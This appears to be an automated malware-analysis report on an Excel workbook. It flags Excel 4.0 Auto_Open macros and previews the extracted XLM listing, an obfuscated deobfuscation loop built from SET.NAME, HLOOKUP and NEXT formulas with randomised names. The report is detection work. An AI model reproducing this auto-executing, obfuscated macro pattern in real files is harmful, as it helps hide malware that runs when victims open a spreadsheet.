MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6875 bytes |
SHA-256: e3d126db4e95a45c77aee2f6560eb860f972962ef4314caba047304402d72ac8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - vzhCVBePiGG
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G170
' 0018 21 LABEL : Cell Value, String Constant - BPIpCB len=0
' 0018 27 LABEL : Cell Value, String Constant - cdNDJRYaXDli len=0
' 0018 24 LABEL : Cell Value, String Constant - CqyzBohYB len=0
' 0018 23 LABEL : Cell Value, String Constant - DjTKGQsM len=0
' 0018 22 LABEL : Cell Value, String Constant - FfmpoaR len=0
' 0018 27 LABEL : Cell Value, String Constant - hSGmrYUIcHVb len=0
' 0018 24 LABEL : Cell Value, String Constant - hsZrSYHnG len=0
' 0018 24 LABEL : Cell Value, String Constant - hXvWScvzN len=0
' 0018 26 LABEL : Cell Value, String Constant - IfNkYsYdsiW len=0
' 0018 23 LABEL : Cell Value, String Constant - jrqFVGXZ len=0
' 0018 23 LABEL : Cell Value, String Constant - lcVcmLCM len=0
' 0018 24 LABEL : Cell Value, String Constant - LppfvBleX len=0
' 0018 21 LABEL : Cell Value, String Constant - MApFaG len=0
' 0018 22 LABEL : Cell Value, String Constant - ndceqQP len=0
' 0018 26 LABEL : Cell Value, String Constant - oUPPQWndtbg len=0
' 0018 20 LABEL : Cell Value, String Constant - pYydx len=0
' 0018 24 LABEL : Cell Value, String Constant - QwoeQQmhj len=0
' 0018 27 LABEL : Cell Value, String Constant - UFviiUazvSjw len=0
' 0018 23 LABEL : Cell Value, String Constant - VIzOAXOq len=0
' 0018 20 LABEL : Cell Value, String Constant - ZPpBJ len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' vzhCVBePiGG,P47,"",-822.00000000000000000000
' vzhCVBePiGG,P48,"",-83.00000000000000000000
' vzhCVBePiGG,P49,"",-320.00000000000000000000
' vzhCVBePiGG,P50,"",-142.00000000000000000000
' vzhCVBePiGG,P51,"",-871.00000000000000000000
' vzhCVBePiGG,P52,"",388.00000000000000000000
' vzhCVBePiGG,G77,"SET.NAME("hXvWScvzN",0+VALUE("0"))",""
' vzhCVBePiGG,G82,"SET.NAME("CqyzBohYB",hXvWScvzN)",""
' vzhCVBePiGG,G84,"SET.NAME("lcVcmLCM",hXvWScvzN)",""
' vzhCVBePiGG,G88,"SET.NAME("cdNDJRYaXDli",COUNTA(IfNkYsYdsiW))",""
' vzhCVBePiGG,G93,"SET.NAME("hsZrSYHnG",COUNTA(FfmpoaR))",""
' vzhCVBePiGG,G98,[],""
' vzhCVBePiGG,G103,"SET.NAME("jrqFVGXZ","")",""
' vzhCVBePiGG,G105,"CqyzBohYB",""
' vzhCVBePiGG,G107,"SET.NAME("MApFaG",HLOOKUP("*",IfNkYsYdsiW,CqyzBohYB,FALSE))",""
' vzhCVBePiGG,G111,"UFviiUazvSjw",""
' vzhCVBePiGG,G116,"SET.NAME("LppfvBleX",hXvWScvzN)",""
' vzhCVBePiGG,G118,[],""
' vzhCVBePiGG,G120,"LppfvBleX",""
' vzhCVBePiGG,G124,"ZPpBJ",""
' vzhCVBePiGG,G126,"BPIpCB",""
' vzhCVBePiGG,G130,"DjTKGQsM",""
' vzhCVBePiGG,G133,"SET.NAME("hSGmrYUIcHVb",VALUE(HLOOKUP("*",FfmpoaR,DjTKGQsM,FALSE)))",""
' vzhCVBePiGG,G137,"oUPPQWndtbg",""
' vzhCVBePiGG,G141,"jrqFVGXZ",""
' vzhCVBePiGG,G145,"lcVcmLCM",""
' vzhCVBePiGG,G147,NEXT(),""
' vzhCVBePiGG,G151,"VIzOAXOq",""
' vzhCVBePiGG,G154,[],""
' vzhCVBePiGG,G158,"ndceqQP",""
' vzhCVBePiGG,G163,NEXT(),""
' vzhCVBePiGG,G168,RETURN(),""
' vzhCVBePiGG,G196,"SET.NAME("pYydx",G77)",""
' vzhCVBePiGG,G198,"IfNkYsYdsiW",""
' vzhCVBePiGG,G203,"SET.NAME("FfmpoaR",R65C12)",""
' vzhCVBePiGG,G207,"SET.NAME("ndceqQP",213)",""
' vzhCVBePiGG,G210,"SET.NAME("QwoeQQmhj",7)",""
' vzhCVBePiGG,G212,pYydx(),""
' vzhCVBePiGG,G213,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.